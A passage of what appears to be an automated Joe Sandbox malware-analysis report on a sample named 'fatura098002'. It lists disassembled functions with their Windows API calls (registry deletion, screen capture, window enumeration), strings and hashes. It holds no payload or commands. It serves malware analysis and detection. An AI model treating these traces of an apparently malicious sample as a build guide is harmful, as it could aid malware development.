GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 007985AD
CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 007985BA
GlobalLock.KERNEL32(00000000), ref: 007985C8
ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 007985D7
GlobalUnlock.KERNEL32(00000000), ref: 007985E0
CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 007985E7
CreateStreamOnHGlobal.COMBASE(00000000,00000001,000000F0), ref: 007985F8
OleLoadPicture.OLEAUT32(000000F0,00000000,00000000,0079FC38,?), ref: 00798611
GlobalFree.KERNEL32(00000000), ref: 00798621
GetObjectW.GDI32(?,00000018,?), ref: 00798641
CopyImage.USER32(?,00000000,00000000,?,00002000), ref: 00798671
DeleteObject.GDI32(?), ref: 00798699
SendMessageW.USER32(?,00000172,00000000,00000000), ref: 007986AF

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
String ID:
API String ID: 3840717409-0
Opcode ID: db6dfeabde939d8df8a536772c323d0b3b387bcffb66ffdcee87cf4e19724e5e
Instruction ID: a6cea2f631b3ce83ee15345142d163e559fcc4a50b0823364b32050d84cfc77e
Opcode Fuzzy Hash: db6dfeabde939d8df8a536772c323d0b3b387bcffb66ffdcee87cf4e19724e5e
Instruction Fuzzy Hash: A2410C75600208AFDF11DFA5DD48EAA7BB8FF89711F108059F905EB260DB789D02CB65

Function 007714BD Relevance: 21.4, APIs: 10, Strings: 2, Instructions: 360timeCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(00000000), ref: 00771502
VariantCopy.OLEAUT32(?,?), ref: 0077150B
VariantClear.OLEAUT32(?), ref: 00771517
VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 007715FB
VarR8FromDec.OLEAUT32(?,?), ref: 00771657
VariantInit.OLEAUT32(?), ref: 00771708
SysFreeString.OLEAUT32(?), ref: 0077178C
VariantClear.OLEAUT32(?), ref: 007717D8
VariantClear.OLEAUT32(?), ref: 007717E7
VariantInit.OLEAUT32(00000000), ref: 00771823

Strings

Default, xrefs: 007716AF
%4d%02d%02d%02d%02d%02d, xrefs: 00771625

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem
String ID: %4d%02d%02d%02d%02d%02d$Default
API String ID: 1234038744-3931177956
Opcode ID: 8338dfbc9aac446c0de31aea781c13f840191aefb59553756e0b6e0f12a28268
Instruction ID: 7dbaf52b4649bfecd505218bb8d9f5b68141c217175d5a4afe10b4df68e03e1f
Opcode Fuzzy Hash: 8338dfbc9aac446c0de31aea781c13f840191aefb59553756e0b6e0f12a28268
Instruction Fuzzy Hash: 68D11471A00105EBDF089F68D889BBDB7B5BF44740F94C156E44AAB180DB3CEC51DBA1

Function 0078B60E Relevance: 21.3, APIs: 10, Strings: 2, Instructions: 285registrylibraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 00709CB3: _wcslen.LIBCMT ref: 00709CBD

Part of subcall function 0078C998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0078B6AE,?,?), ref: 0078C9B5
Part of subcall function 0078C998: _wcslen.LIBCMT ref: 0078C9F1
Part of subcall function 0078C998: _wcslen.LIBCMT ref: 0078CA68
Part of subcall function 0078C998: _wcslen.LIBCMT ref: 0078CA9E

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0078B6F4
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0078B772
RegDeleteValueW.ADVAPI32(?,?), ref: 0078B80A
RegCloseKey.ADVAPI32(?), ref: 0078B87E
RegCloseKey.ADVAPI32(?), ref: 0078B89C
LoadLibraryA.KERNEL32(advapi32.dll), ref: 0078B8F2
GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 0078B904
RegDeleteKeyW.ADVAPI32(?,?), ref: 0078B922
FreeLibrary.KERNEL32(00000000), ref: 0078B983
RegCloseKey.ADVAPI32(00000000), ref: 0078B994

Strings

RegDeleteKeyExW, xrefs: 0078B8FE
advapi32.dll, xrefs: 0078B8ED

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID: _wcslen$Close$DeleteLibrary$AddressBuffCharConnectFreeLoadOpenProcRegistryUpperValue
String ID: RegDeleteKeyExW$advapi32.dll
API String ID: 146587525-4033151799
Opcode ID: 02c43b98738ec68ef39ce64ef3775034f313e756639682a99d5138e6200c8baa
Instruction ID: 0148b5582770374f6c4bb02ea3601283a4afbd54c0601012714159169ca38a8a
Opcode Fuzzy Hash: 02c43b98738ec68ef39ce64ef3775034f313e756639682a99d5138e6200c8baa
Instruction Fuzzy Hash: 4CC18E71204201EFD715EF14C499F2ABBE5BF84318F14859DF59A8B2A2CB39EC45CB91

Function 0078255C Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 169windowCOMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 007825D8
CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 007825E8
CreateCompatibleDC.GDI32(?), ref: 007825F4
SelectObject.GDI32(00000000,?), ref: 00782601
StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000006,?,?,?,00CC0020), ref: 0078266D
GetDIBits.GDI32(?,?,00000000,00000000,00000000,00000028,00000000), ref: 007826AC
GetDIBits.GDI32(?,?,00000000,?,00000000,00000028,00000000), ref: 007826D0
SelectObject.GDI32(?,?), ref: 007826D8
DeleteObject.GDI32(?), ref: 007826E1
DeleteDC.GDI32(?), ref: 007826E8
ReleaseDC.USER32(00000000,?), ref: 007826F3

Strings

(, xrefs: 0078268D

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
String ID: (
API String ID: 2598888154-3887548279
Opcode ID: 641de66d5ced8c09f180546907f518fad430a358afddeea825cf428011fbf3d0
Instruction ID: d5461daa8f1232261d388313615f24ab28ca4edc37d956c031a5d1f234ebee7a
Opcode Fuzzy Hash: 641de66d5ced8c09f180546907f518fad430a358afddeea825cf428011fbf3d0
Instruction Fuzzy Hash: 526115B5D00209EFCF05DFA8D884AAEBBB5FF48310F20841AE555A7250E734A941CF64

Function 0073DA5D Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE

Download Yara Rule

APIs

___free_lconv_mon.LIBCMT ref: 0073DAA1

Part of subcall function 0073D63C: _free.LIBCMT ref: 0073D659
Part of subcall function 0073D63C: _free.LIBCMT ref: 0073D66B
Part of subcall function 0073D63C: _free.LIBCMT ref: 0073D67D
Part of subcall function 0073D63C: _free.LIBCMT ref: 0073D68F
Part of subcall function 0073D63C: _free.LIBCMT ref: 0073D6A1
Part of subcall function 0073D63C: _free.LIBCMT ref: 0073D6B3
Part of subcall function 0073D63C: _free.LIBCMT ref: 0073D6C5
Part of subcall function 0073D63C: _free.LIBCMT ref: 0073D6D7
Part of subcall function 0073D63C: _free.LIBCMT ref: 0073D6E9
Part of subcall function 0073D63C: _free.LIBCMT ref: 0073D6FB
Part of subcall function 0073D63C: _free.LIBCMT ref: 0073D70D
Part of subcall function 0073D63C: _free.LIBCMT ref: 0073D71F
Part of subcall function 0073D63C: _free.LIBCMT ref: 0073D731

_free.LIBCMT ref: 0073DA96

Part of subcall function 007329C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0073D7D1,00000000,00000000,00000000,00000000,?,0073D7F8,00000000,00000007,00000000,?,0073DBF5,00000000), ref: 007329DE
Part of subcall function 007329C8: GetLastError.KERNEL32(00000000,?,0073D7D1,00000000,00000000,00000000,00000000,?,0073D7F8,00000000,00000007,00000000,?,0073DBF5,00000000,00000000), ref: 007329F0

_free.LIBCMT ref: 0073DAB8
_free.LIBCMT ref: 0073DACD
_free.LIBCMT ref: 0073DAD8
_free.LIBCMT ref: 0073DAFA
_free.LIBCMT ref: 0073DB0D
_free.LIBCMT ref: 0073DB1B
_free.LIBCMT ref: 0073DB26
_free.LIBCMT ref: 0073DB5E
_free.LIBCMT ref: 0073DB65
_free.LIBCMT ref: 0073DB82
_free.LIBCMT ref: 0073DB9A

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: ba22e2253fd9043e17e20f629915dec01e6f329c80ec3ff74eae4f6cf254c7d2
Instruction ID: 581bc6993fab5e6032b419e8dd6a50ca15eaebf048ff3206e75da2e0766ac547
Opcode Fuzzy Hash: ba22e2253fd9043e17e20f629915dec01e6f329c80ec3ff74eae4f6cf254c7d2
Instruction Fuzzy Hash: 2B314C72604205DFFB32AA79F849B56B7E9FF00310F154469E499E71A3DB39BC418B20

Function 0076365B Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 267windowtimeCOMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000100), ref: 0076369C
_wcslen.LIBCMT ref: 007636A7
SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00763797
GetClassNameW.USER32(?,?,00000400), ref: 0076380C
GetDlgCtrlID.USER32(?), ref: 0076385D
GetWindowRect.USER32(?,?), ref: 00763882
GetParent.USER32(?), ref: 007638A0
ScreenToClient.USER32(00000000), ref: 007638A7
GetClassNameW.USER32(?,?,00000100), ref: 00763921
GetWindowTextW.USER32(?,?,00000400), ref: 0076395D

Strings

%s%u, xrefs: 00763734

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID: ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout_wcslen
String ID: %s%u
API String ID: 4010501982-679674701
Opcode ID: 508cf67f1fc16e0d56db2296085463ab2605605514073a5cfaa0ed6928a07a4c
Instruction ID: 88a184ffba92ce7d8498f8a033e4ef677703a80fa32b6a6d574f5d1ca037d8eb
Opcode Fuzzy Hash: 508cf67f1fc16e0d56db2296085463ab2605605514073a5cfaa0ed6928a07a4c
Instruction Fuzzy Hash: FF919371204706EFD719DF24C885BEAB7A8FF44354F008619FD9AD2190DB38EA55CBA1

Function 00764954 Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 253COMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000400), ref: 00764994
GetWindowTextW.USER32(?,?,00000400), ref: 007649DA
_wcslen.LIBCMT ref: 007649EB
CharUpperBuffW.USER32(?,00000000), ref: 007649F7
_wcsstr.LIBVCRUNTIME ref: 00764A2C
GetClassNameW.USER32(00000018,?,00000400), ref: 00764A64
GetWindowTextW.USER32(?,?,00000400), ref: 00764A9D
GetClassNameW.USER32(00000018,?,00000400), ref: 00764AE6
GetClassNameW.USER32(?,?,00000400), ref: 00764B20
GetWindowRect.USER32(?,?), ref: 00764B8B

Strings

ThumbnailClass, xrefs: 00764A6F, 00764AF1

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID: ClassName$Window$Text$BuffCharRectUpper_wcslen_wcsstr
String ID: ThumbnailClass
API String ID: 1311036022-1241985126
Opcode ID: 95ea988894616b492faf9a4cb1d4652b96eea0074c75ae750460cc58a6c1924d
Instruction ID: 86d03eebc15da39a27ca0d35f02c1b3e2959f3b8b00e676283d390ba39f4837d
Opcode Fuzzy Hash: 95ea988894616b492faf9a4cb1d4652b96eea0074c75ae750460cc58a6c1924d
Instruction Fuzzy Hash: 6391BC71004205EFDB05DF14C989FAA77E8FF84314F04846AFD8A9A196DB38ED46CBA1

Function 0078CC34 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 104registryCOMMON

Download Yara Rule

APIs

RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 0078CC64
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?,00000000), ref: 0078CC8D
FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 0078CD48

Part of subcall function 0078CC34: RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 0078CCAA
Part of subcall function 0078CC34: LoadLibraryA.KERNEL32(advapi32.dll,?,?,00000000), ref: 0078CCBD
Part of subcall function 0078CC34: GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 0078CCCF
Part of subcall function 0078CC34: FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 0078CD05
Part of subcall function 0078CC34: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 0078CD28

RegDeleteKeyW.ADVAPI32(?,?), ref: 0078CCF3

Strings

RegDeleteKeyExW, xrefs: 0078CCC9
advapi32.dll, xrefs: 0078CCB8

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID: Library$EnumFree$AddressCloseDeleteLoadOpenProc
String ID: RegDeleteKeyExW$advapi32.dll
API String ID: 2734957052-4033151799
Opcode ID: 7a634c5ab9a05a98cc622751e8e5a5b459dd47d986792532cb47ed055b803af5
Instruction ID: 111760810ec4e6fa4a6a6e7e516eef06427ae2230743fde3b58bfa0734241d79
Opcode Fuzzy Hash: 7a634c5ab9a05a98cc622751e8e5a5b459dd47d986792532cb47ed055b803af5
Instruction Fuzzy Hash: 663180B1A41128BBDB22AB55DC88EFFBB7CEF05740F004166A905E7140DA389A46DBB4

Function 0076E6B0 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON

Download Yara Rule

APIs

timeGetTime.WINMM ref: 0076E6B4

Part of subcall function 0071E551: timeGetTime.WINMM(?,?,0076E6D4), ref: 0071E555

Sleep.KERNEL32(0000000A), ref: 0076E6E1
EnumThreadWindows.USER32(?,Function_0006E665,00000000), ref: 0076E705
FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 0076E727
SetActiveWindow.USER32 ref: 0076E746
SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 0076E754
SendMessageW.USER32(00000010,00000000,00000000), ref: 0076E773
Sleep.KERNEL32(000000FA), ref: 0076E77E
IsWindow.USER32 ref: 0076E78A
EndDialog.USER32(00000000), ref: 0076E79B

Strings

BUTTON, xrefs: 0076E719

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
String ID: BUTTON
API String ID: 1194449130-3405671355
Opcode ID: 19437b723f9e7415a491e68c19b8597da75905dfbded1df828c175617b7f345b
Instruction ID: 86521310e75472d10a3aacb3a94c598b13e2291801384432592317a5c0d57fbe
Opcode Fuzzy Hash: 19437b723f9e7415a491e68c19b8597da75905dfbded1df828c175617b7f345b
Instruction Fuzzy Hash: 022181B5241304AFEF025F64EC89A253B79FB64748B10C426F902825A2DB7DAC16DB3C

Function 0076E9FC Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 71COMMON

Download Yara Rule

APIs

Part of subcall function 00709CB3: _wcslen.LIBCMT ref: 00709CBD

mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 0076EA5D
mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 0076EA73
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0076EA84
mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 0076EA96
mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 0076EAA7

Strings

open , xrefs: 0076EA0C
status PlayMe mode, xrefs: 0076EA58
play PlayMe, xrefs: 0076EAA2
alias PlayMe, xrefs: 0076EA36
play PlayMe wait, xrefs: 0076EA91
close PlayMe, xrefs: 0076EA6E, 0076EA9B

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID: SendString$_wcslen
String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
API String ID: 2420728520-1007645807
Opcode ID: c026fb8de327522d0f1e64df7d1f7f407de392dde57161a0db7256e657b1c9f5
Instruction ID: 1b06f77cd8ed26d46f3f078b746994d8739d41fab34daca6f82c9fbfe2a82369
Opcode Fuzzy Hash: c026fb8de327522d0f1e64df7d1f7f407de392dde57161a0db7256e657b1c9f5
Instruction Fuzzy Hash: 3711C6B5A50219B9D720A7A5DD8AEFF6BBCEFD1F00F00452D7801A20D1EE785D05C6B0

Function 00719838 Relevance: 18.1, APIs: 12, Instructions: 137COMMON

Download Yara Rule

APIs

Part of subcall function 00719944: GetWindowLongW.USER32(?,000000EB), ref: 00719952

GetSysColor.USER32(0000000F), ref: 00719862

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID: ColorLongWindow
String ID:
API String ID: 259745315-0
Opcode ID: 62a85e8faff2c4f906e914aa6e2971783f75e286a672e360a4f6bd711bf613a0
Instruction ID: 24f4d7fbb394ccaee313e8a51af656b71843643a6e8db4cefef2649b63a624ea
Opcode Fuzzy Hash: 62a85e8faff2c4f906e914aa6e2971783f75e286a672e360a4f6bd711bf613a0
Instruction Fuzzy Hash: 0D419E31104644AFDF219B3C9C98BF93BA5AB46321F148606FAA28B1E1D6789C83DB14

Function 00738D45 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 300COMMONLIBRARYCODE

Download Yara Rule

Strings

.r, xrefs: 0073903A, 00738FD0, 00738FF2

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID:
String ID: .r
API String ID: 0-397233886
Opcode ID: 2ca0a767030ac3231e6f8209e74b2fbdc42a82379da40d9e5422bbaed7f4787e
Instruction ID: 692916969912b000616d9d3dd1027c5642aba0b4fdf7ee25fd58b7e65c4dc2c7
Opcode Fuzzy Hash: 2ca0a767030ac3231e6f8209e74b2fbdc42a82379da40d9e5422bbaed7f4787e
Instruction Fuzzy Hash: 6CC1F075A0434AEFEB159FA8D844BADBBB0BF09310F144099F554AB393C77C9941CB62

